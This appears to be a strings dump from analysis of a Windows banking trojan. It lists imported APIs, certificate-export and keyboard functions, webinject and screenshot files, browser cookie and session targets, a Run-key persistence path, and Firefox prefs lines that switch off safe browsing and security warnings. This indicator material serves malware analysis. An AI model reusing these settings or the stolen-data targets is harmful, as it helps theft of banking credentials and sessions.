HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
c:\windows\system32\WS2_32.dll
c:\windows\system32\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
svchost.exe_1128_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
%System%\WININET.dll
%System%\WININET.dll
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\ntdll.dll
%System%\USER32.dll
%System%\USER32.dll
%System%\CRYPT32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
%System%\ADVAPI32.dll
%System%\ADVAPI32.dll
c:\windows\system32\WS2_32.dll
c:\windows\system32\WS2_32.dll
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
svchost.exe_1180_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
webinjects.txt
webinjects.txt
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
